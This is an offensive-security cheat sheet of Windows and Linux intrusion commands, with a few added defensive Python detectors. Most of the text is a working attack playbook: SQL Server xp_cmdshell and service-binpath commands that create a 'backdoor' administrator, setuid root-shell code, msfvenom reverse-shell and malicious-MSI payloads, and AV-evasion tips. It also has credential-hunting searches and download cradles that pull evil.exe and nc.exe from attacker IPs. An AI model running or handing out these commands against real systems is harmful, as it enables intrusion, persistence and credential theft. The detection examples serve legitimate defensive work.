1. Various Tricks
Upgrading simple shells to fully interactive TTYs
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Temporary Web Server
python -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
Use Nmap to remotely execute commands through SQL
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user backdoor backdoor123 /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse 10.11.1.31 -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators backdoor /add"
Make browser appear as a search engine
Use curl (search engine agents: googlebot, slurp, msnbot, ...)
curl -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' 'http://<victim_ip>/robots.txt'
Change headers of an HTTP request using curl
Example:
Check for the Shellshock vulnerability (PoC: '() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id)
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
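Added example, not code from the original notes: the defender's side of the curl check above, a Python scan of web server access-log lines for the Shellshock probe pattern. The log lines, hosts and timestamps are constructed for this example; the regex matches on the `() {` function-definition prefix (which every probe needs) in the User-Agent, Referer and request line, the fields a bash-backed CGI exports as environment variables.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines in Apache combined log format; hosts and
# timestamps are made up for this example, not taken from the original notes.
SAMPLE_LOG = r'''203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo \"CVE-2014-6271 vulnerable\" bash -c id"
203.0.113.11 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.12 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; echo probe" "curl/7.68.0"
'''

# Combined log format; quoted fields may contain backslash-escaped quotes, as
# Apache writes them when a header value itself contains a double quote.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# The function-definition prefix "() {" is the part every Shellshock probe needs;
# matching on it rather than on "echo ... vulnerable" catches other payloads too.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Fields a bash-backed CGI would export as environment variables.
CHECKED_FIELDS = ("agent", "referer", "request")


def find_shellshock_probes(log_text: str) -> List[Dict[str, str]]:
    """Return one record per log line whose checked fields carry the probe pattern."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # unparseable line; a real pipeline would count these separately
        for field in CHECKED_FIELDS:
            if SHELLSHOCK_RE.search(match.group(field)):
                hits.append({
                    "host": match.group("host"),
                    "time": match.group("time"),
                    "field": field,
                    "status": match.group("status"),
                    "value": match.group(field),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(f'{hit["host"]} {hit["time"]} {hit["field"]} status={hit["status"]}: {hit["value"]}')
```

A 500 on a /cgi-bin/ request together with a probe in the headers is the combination worth alerting on; a 200 with no other signal may just be a scanner being answered by a static page.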
Execute process as another user (with credentials)
1. Create a ps1 file, e.g. run.ps1, with PowerShell commands as below:
$secpasswd = ConvertTo-SecureString "<admin_pass_clear_text>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<Admin_username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
[System.Diagnostics.Process]::Start("C:/users/public/<reverse_shell.exe>", "", $mycreds.Username, $mycreds.Password, $computer)
2. Upload run.ps1 to the victim's machine
3. Execute the PowerShell command:
powershell -ExecutionPolicy Bypass -File c:\users\public\run.ps1
Get a root shell from MySQL
https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/
Setuid binary for root shell
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
    setuid(0); setgid(0); system("/bin/bash");
    return 0;
}
Alternatively
#include <stdio.h>
#include <unistd.h>
int main(void)
{
    setuid(0);
    execl("/bin/sh", "sh", (char *)0);
    return 0;
}
gcc -o /var/tmp/rootme rootme.c
chown root:root /var/tmp/rootme && chmod 4777 /var/tmp/rootme
Alternatively
cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p
Leverage xp_cmdshell to get a shell
sqsh -S <ip_address> -U sa -P <password>
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
xp_cmdshell 'dir C:\'
go
Bypassing white-listing
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
Create small shellcode
msfvenom -p windows/shell_reverse_tcp -a x86 -f python --platform windows LHOST=<ip> LPORT=443 -b "\x00" EXITFUNC=thread --smallest -e x86/fnstenv_mov
2. RECON
Use datasploit as a Recon framework
https://github.com/DataSploit/datasploit
Run web scanners
dirb http{s}://<ip_address>:<port> /usr/share/wordlists/dirb/{common/small/vulns}.txt
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,301,302,307,403,500' -e
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
nikto -port {web ports} -host <ip_address> -o <output file.txt>
Use /usr/share/seclists/Discovery for some good word lists
Check for SMB vulnerabilities
We don't want to run smb-brute or smb-flood because they might lock out accounts or cause a DoS to the services:
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script "not brute and not dos and smb-*" -vv -d 10.11.1.1-254
3. Windows Privilege Escalation
Information Gathering
+ What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
+ Get the hostname and username (if available)
+ Learn about your environment
List other users on the box
net users
net user <username>
Networking/Routing Info
ipconfig /all
route print
arp -a
Active Network Connections
Firewall Status (only on Win XP SP2 and above)
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
Scheduled tasks
schtasks /query /fo LIST /v
+ Check how running processes link to started services
+ Windows services that are started:
+ Driver madness (3rd-party drivers may have holes)
Check systeminfo output against exploit-suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
+ Run windows-privesc script
https://github.com/pentestmonkey/windows-privesc-check
WMIC
Windows Management Instrumentation Command Line
Windows XP requires admin
+ Use wmic_info.bat script for automation
http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar
+ System Info
wmic COMPUTERSYSTEM get TotalPhysicalMemory,caption
wmic CPU Get /Format:List
+ Check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn
1. Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
2. After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing
3. Search the installed patches for a given KB number:
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
Examples:
Windows 2K SP4 - Windows 7 (x86): KiTrap0D (KB979682)
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"
Windows Vista/2008 6.1.6000 x32, Windows Vista/2008 6.1.6001 x32, Windows 7 6.2.7600 x32, Windows 7/2008 R2 6.2.7600 x64 (no good exploit - unlikely: Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"
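Added example, not code from the original notes: the KB lookup from steps 1 to 3 above done in one pass in Python, so a patch-compliance check can report every missing fix at once instead of one findstr per KB. The wmic qfe output below is constructed (KB9999999 is a placeholder); the KB-to-exploit table is the one the notes give. Caveat for either side of the check: a later cumulative update may supersede one of these KBs, so a KB that is absent from the list is a lead to verify, not proof that the fix is missing.

```python
import re
from typing import Dict, Set

# KB numbers the section above associates with known privilege-escalation fixes.
PRIVESC_FIXES: Dict[str, str] = {
    "KB979682": "KiTrap0D",
    "KB2393802": "MS11-011",
    "KB982799": "MS10-059",
    "KB979683": "MS10-021",
    "KB2592799": "MS11-080",
}

# Constructed sample of `wmic qfe get Caption,Description,HotFixID,InstalledOn`
# output; KB9999999 is a placeholder hotfix, not a real one.
SAMPLE_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2393802  Security Update  KB2393802  2/25/2011
http://support.microsoft.com/?kbid=982799   Security Update  KB982799   8/11/2010
http://support.microsoft.com/?kbid=9999999  Hotfix           KB9999999  7/2/2011
"""

# Whole-token match, so the kbid=... inside the Caption URL is not picked up.
HOTFIX_RE = re.compile(r"KB\d+", re.IGNORECASE)


def installed_hotfixes(qfe_output: str) -> Set[str]:
    """Collect the HotFixID tokens from wmic qfe output, normalised to upper case."""
    found = set()
    for line in qfe_output.splitlines():
        for token in line.split():
            if HOTFIX_RE.fullmatch(token):
                found.add(token.upper())
    return found


def missing_fixes(qfe_output: str, fixes: Dict[str, str] = PRIVESC_FIXES) -> Dict[str, str]:
    """Map each KB from the table that is not present in the output to its exploit name."""
    installed = installed_hotfixes(qfe_output)
    return {kb: name for kb, name in fixes.items() if kb not in installed}


if __name__ == "__main__":
    # On a Windows host, feed the real output instead of the sample:
    #   wmic qfe get Caption,Description,HotFixID,InstalledOn > qfe.txt
    for kb, name in missing_fixes(SAMPLE_QFE).items():
        print(f"{kb} ({name}) not found in installed hotfixes")
```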
Stored Credentials
1. Directories that contain the configuration files (however, better check the entire filesystem). These files contain passwords either in clear text or Base64-encoded:
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
2. When the box is connected to a Domain:
a. Look for Groups.xml in SYSVOL
GPO preferences can be used to create local users on domain machines, so passwords might be stored there. Any authenticated user has read access to this file. The password is encrypted with AES, but the static key is published on the MSDN website, so it can be decrypted.
b. Search for other policy preference files that can have the optional "cPassword" attribute set:
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
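Added example, not code from the original notes: a Python scanner that walks a SYSVOL copy and reports every policy preference file (Groups.xml, ScheduledTasks.xml and the others listed above) that still carries a cpassword attribute, which is the audit a domain owner runs to find and remove these entries. It reports the element and account name and the ciphertext length only; it does not decrypt. The three sample files, their GUIDs and the PLACEHOLDER_CIPHERTEXT values are constructed for this example.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample Group Policy Preference files laid out as under SYSVOL
# (GUIDs, names and the cpassword values are placeholders, not real ciphertext).
SAMPLE_FILES = {
    os.path.join("Groups", "Groups.xml"): """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CONSTRUCTED-GUID}">
  <User clsid="{CONSTRUCTED-GUID}" name="backup" changed="2015-03-12 10:20:31">
    <Properties action="U" userName="backup" cpassword="PLACEHOLDER_CIPHERTEXT" neverExpires="1"/>
  </User>
</Groups>
""",
    os.path.join("ScheduledTasks", "ScheduledTasks.xml"): """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CONSTRUCTED-GUID}">
  <TaskV2 clsid="{CONSTRUCTED-GUID}" name="Nightly" changed="2015-03-12 10:25:00">
    <Properties action="U" name="Nightly" runAs="CORP\\svc_backup" cpassword="PLACEHOLDER_CIPHERTEXT" logonType="Password"/>
  </TaskV2>
</ScheduledTasks>
""",
    os.path.join("Drives", "Drives.xml"): """<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{CONSTRUCTED-GUID}">
  <Drive clsid="{CONSTRUCTED-GUID}" name="S:" changed="2015-03-12 10:30:00">
    <Properties action="U" path="\\\\fs01\\share" label="Share" letter="S"/>
  </Drive>
</Drives>
""",
}


def write_sample_sysvol(dest_dir: str) -> None:
    """Write the constructed files under dest_dir in the SYSVOL folder layout."""
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(dest_dir, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def find_cpassword(xml_bytes: bytes, source: str) -> List[Dict[str, object]]:
    """Report every element carrying a non-empty cpassword attribute (any case)."""
    root = ET.fromstring(xml_bytes)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if attr.lower() != "cpassword" or not value:
                continue
            owner = parents.get(elem, elem)  # the User, TaskV2, ... element naming the item
            account = (elem.attrib.get("userName") or elem.attrib.get("runAs")
                       or owner.attrib.get("name", ""))
            findings.append({"file": source, "element": owner.tag,
                             "account": account, "ciphertext_length": len(value)})
    return findings


def scan_sysvol(root_dir: str) -> List[Dict[str, object]]:
    """Walk root_dir (a SYSVOL copy or mount) and collect findings from every XML file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                try:
                    findings.extend(find_cpassword(fh.read(), os.path.relpath(path, root_dir)))
                except ET.ParseError:
                    pass  # not well-formed policy XML; a production scanner would log it
    return sorted(findings, key=lambda f: str(f["file"]))


def scan_sample() -> List[Dict[str, object]]:
    """Write the constructed files to a temporary directory and scan them."""
    with tempfile.TemporaryDirectory() as base:
        write_sample_sysvol(base)
        return scan_sysvol(base)


if __name__ == "__main__":
    for finding in scan_sample():
        print(finding)
```

Point it at \\<domain>\SYSVOL\<domain>\Policies (or an offline copy) to cover every GPO; Drives.xml in the sample has no cpassword and is correctly skipped.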
3. Automated Tools
a. Metasploit Module
post/windows/gather/credentials/gpp
post/windows/gather/enum_unattend
b. Powersploit
https://github.com/PowerShellMafia/PowerSploit
Get-GPPPassword
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon
4. Search filesystem:
a. Search for specific keywords:
dir /s *pass* == *cred* == *vnc* == *.config*
b. Search certain file types for a keyword:
findstr /si password *.xml *.ini *.txt
c. Search for certain files:
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
d. Grep the registry for keywords (e.g. "password"):
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
e. Find writeable files
I. /a searches by attribute; here r is read-only and d is directory, and the minus signs negate those attributes, so we are looking for writable files only.
II. /s means recurse subdirectories.
III. /b means bare format: path and filename only.
Trusted Service Paths
1. List all unquoted service paths (minus built-in Windows services) on our compromised machine:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Suppose we found:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
If you look at the registry entry for this service with Regedit you can see the ImagePath value is:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
To be secure it should be like this:
"C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe"
When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it finds:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program Folder\A.exe
...
2. Check the permissions of the folder path:
icacls "C:\Program Files (x86)\Program Folder"
3. If we can write in the path, we plant a backdoor with the name Windows will look for (e.g. A.exe) and restart the service.
Metasploit module:
exploit/windows/local/trusted_service_path
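Added example, not code from the original notes: the unquoted-path rule above in Python, so the search order and the directories to check with icacls come out of one script. It parses the CSV form of the same wmic query (`wmic service get name,displayname,pathname,startmode /format:csv`), applies the same filter as the findstr chain (Auto start, not under the Windows directory, path not quoted), and for each hit lists every space-delimited prefix Windows tries; this generalises the list above, which elides the `C:\Program Files (x86)\Program.exe` step. Service names, paths and the host in the sample are constructed.

```python
import csv
import ntpath
from typing import Dict, List

# Constructed sample of `wmic service get name,displayname,pathname,startmode /format:csv`
# output (host, service names and paths are made up); not from the original notes.
SAMPLE_CSV = r"""
Node,Name,DisplayName,PathName,StartMode
HOST1,GoodSvc,Good Service,"C:\Program Files\Good Vendor\good.exe" -service,Auto
HOST1,BadSvc,Bad Service,C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe,Auto
HOST1,Spooler,Print Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,ManualSvc,Manual Service,C:\Program Files (x86)\Other App\svc.exe,Manual
"""


def search_candidates(path: str) -> List[str]:
    """Paths CreateProcess tries, in order, for an unquoted image path containing
    spaces: each space-delimited prefix with .exe appended, then the full path."""
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    candidates.append(path)
    return candidates


def unquoted_auto_services(csv_text: str) -> List[Dict[str, object]]:
    """Apply the same filter as the wmic | findstr chain above (Auto start, not
    under the Windows directory, path not quoted) and, for each hit, list the
    directories whose permissions decide whether the path can be hijacked."""
    lines = [line for line in csv_text.splitlines() if line.strip()]
    # wmic does not quote CSV fields, so csv quote processing must be disabled;
    # a PathName containing a comma would still break this (rare, documented assumption).
    reader = csv.DictReader(lines, quoting=csv.QUOTE_NONE)
    findings = []
    for row in reader:
        path = row["PathName"].strip()
        if row["StartMode"].strip().lower() != "auto":
            continue
        if path.startswith('"') or path.lower().startswith("c:\\windows\\"):
            continue
        if " " not in path:
            continue
        candidates = search_candidates(path)
        findings.append({
            "name": row["Name"],
            "path": path,
            "candidates": candidates,
            "dirs_to_check": sorted({ntpath.dirname(c) for c in candidates}, key=str.lower),
        })
    return findings


if __name__ == "__main__":
    for finding in unquoted_auto_services(SAMPLE_CSV):
        print(finding["name"], finding["path"])
        for candidate in finding["candidates"]:
            print("  tries:", candidate)
        for directory in finding["dirs_to_check"]:
            print("  icacls", f'"{directory}"')
```

Each directory in dirs_to_check is one icacls call; the fix on the defending side is to quote the ImagePath (sc config <service> binPath= "\"C:\...\Executable.exe\"") and to keep the Program Files tree non-writable for non-administrators.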
Vulnerable Services
Search for services that have a binary path (binpath) property which
can be modified by non-Admin users - in that case change the binpath to execute
a command of your own.
Note: Windows XP shipped with several vulnerable built-in
services.
Use accesschk from SysInternals to search for these vulnerable
services.
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
For Windows XP, version 5.2 of accesschk is needed:
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\
Then query the service using Windows sc:
sc qc <vulnerable service name>
Then change the binpath to execute your own commands (restart of
the service will most likely be needed):
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>
Note - Might need to use the depend attribute explicitly:
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>
Metasploit module:
exploit/windows/local/service_permissions
AlwaysInstallElevated
AlwaysInstallElevated is a setting that allows non-privileged users
the ability to run Microsoft Windows Installer Package Files (MSI) with
elevated (SYSTEM) permissions.
Check if these 2 registry values are set to "1":
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If they are, create your own malicious msi:
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
Then use msiexec on victim to execute your msi:
msiexec /quiet /qn /i C:\evil.msi
Metasploit module:
exploit/windows/local/always_install_elevated
Bypassing AV
+ Use Veil-Evasion
+ Create your own executable by "compiling" PowerShell scripts
+ Use Metasploit to substitute custom EXE and MSI binaries. You can set EXE::Custom or MSI::Custom to point to your binary prior to executing the module.
Getting GUI
+ Using meterpreter, inject vnc session:
run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false
+ Enable RDP:
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=udp
OR (meterpreter):
run post/windows/manage/enable_rdp
Python exploits
Compiling Python Exploits for Windows on Linux
1. Install PyInstaller for Windows under Wine on Kali, then:
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py
2. Run pyinstaller, located under the same directory as the Python scripts:
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
3. Execute with wine:
wine ~/.wine/drive_c/dist/HelloWorld.exe
File Transfers
Commands run through the obtained shell must be non-interactive.
TFTP
Windows XP and Win 2003 contain a tftp client; Windows 7 does not by default.
tftp clients are usually non-interactive, so they work through an obtained shell:
atftpd --daemon --port 69 /tftp
Windows> tftp -i 192.168.30.45 GET nc.exe
FTP
Windows contains an FTP client, but it is usually interactive.
Solution: scripted parameters in the ftp client: ftp -s
ftp-commands
echo open 192.168.30.5 21 > ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
VBScript
wget-vbs script using the echo trick again; copy and paste the commands into the shell:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.102/evil.exe test.txt
Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.102/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Webdav
On Kali Linux install wsgidav and cheroot:
pip install wsgidav cheroot
Start the wsgidav on a restricted folder:
mkdir /tmp/webdav_folder
wsgidav --host=0.0.0.0 --port=80 --root=/tmp/webdav_folder
On Windows mount this folder using net use:
net use * http://YOUR_IP_ADDRESS/
BitsAdmin
bitsadmin /transfer n http://domain/file c:%homepath%file
debug.exe
First use upx or similar to compress the executable.
Then use exe2bat to convert the executable into a series of echo commands that are meant to be copied and pasted into the remote system:
wine exe2bat.exe nc.exe nc.txt
Then copy and paste each command from nc.txt into the remote system. The commands will gradually rebuild the executable on the target machine.
certutil
certutil.exe -URL
will fetch ANY file and download it here:
C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
Resources
4. Windows Post Exploitation
Backdoor User
net user backdoor backdoor123 /add
net localgroup administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add
Enabling RDP
Same commands as under "Getting GUI" in section 3 (Windows Privilege Escalation).
Dumping Credentials
In order to prevent the "clear-text" password from being placed in LSASS, the following registry value needs to be set to "0" (Digest disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" (DWORD)
This registry value is worth monitoring in your environment, since an attacker may wish to set it to 1 to enable Digest password support, which forces "clear-text" passwords to be placed in LSASS on any version of Windows from Windows 7/2008 R2 up to Windows 10/2012 R2. Windows 8.1/2012 R2 and newer do not have a "UseLogonCredential" DWORD value by default, so it would have to be created; the existence of this value on these systems may indicate a problem.
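Added example, not code from the original notes: the monitoring the paragraph above recommends, as Python detection logic over Sysmon Event ID 13 (registry value set) records. The three events below are constructed and use a simplified one-line key=value layout (the field names EventID, TargetObject, Details, Image and User follow Sysmon's schema; the layout does not). A write of 1 to UseLogonCredential is rated high; any other write to the value, including the hardening write of 0, is recorded as info so the change is still visible.

```python
import re
from typing import Dict, List

# Constructed, simplified renderings of Sysmon Event ID 13 (registry value set)
# records: one event per line, key=value fields separated by '|'. Users, hosts and
# times are made up; the field names follow Sysmon's, the layout does not.
SAMPLE_EVENTS = r"""
EventID=13|UtcTime=2023-10-10 13:55:36|Image=C:\Windows\System32\reg.exe|User=CORP\alice|TargetObject=HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential|Details=DWORD (0x00000001)
EventID=13|UtcTime=2023-10-10 14:02:11|Image=C:\Windows\System32\svchost.exe|User=NT AUTHORITY\SYSTEM|TargetObject=HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostname|Details=HOST1
EventID=13|UtcTime=2023-10-10 15:10:00|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|User=CORP\admin|TargetObject=HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential|Details=DWORD (0x00000000)
"""

# Compared case-insensitively against the end of TargetObject, so the HKLM\System
# vs HKEY_LOCAL_MACHINE\SYSTEM spelling differences between tools do not matter.
WDIGEST_VALUE = r"\securityproviders\wdigest\uselogoncredential"

# Sysmon renders DWORD data as "DWORD (0x00000001)".
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]+)\)")


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed record into its key=value fields."""
    return dict(field.split("=", 1) for field in line.split("|") if "=" in field)


def wdigest_alerts(event_text: str) -> List[Dict[str, object]]:
    """Flag every write to UseLogonCredential: value 1 re-enables clear-text
    credentials in LSASS (high); any other write is reported as info."""
    alerts = []
    for line in event_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if event.get("EventID") != "13":
            continue
        if not event.get("TargetObject", "").lower().endswith(WDIGEST_VALUE):
            continue
        match = DWORD_RE.search(event.get("Details", ""))
        value = int(match.group(1), 16) if match else None
        alerts.append({
            "time": event.get("UtcTime", ""),
            "user": event.get("User", ""),
            "image": event.get("Image", ""),
            "value": value,
            "severity": "high" if value == 1 else "info",
        })
    return alerts


if __name__ == "__main__":
    for alert in wdigest_alerts(SAMPLE_EVENTS):
        print(f'[{alert["severity"]}] {alert["time"]} {alert["user"]} via {alert["image"]} '
              f'set UseLogonCredential={alert["value"]}')
```

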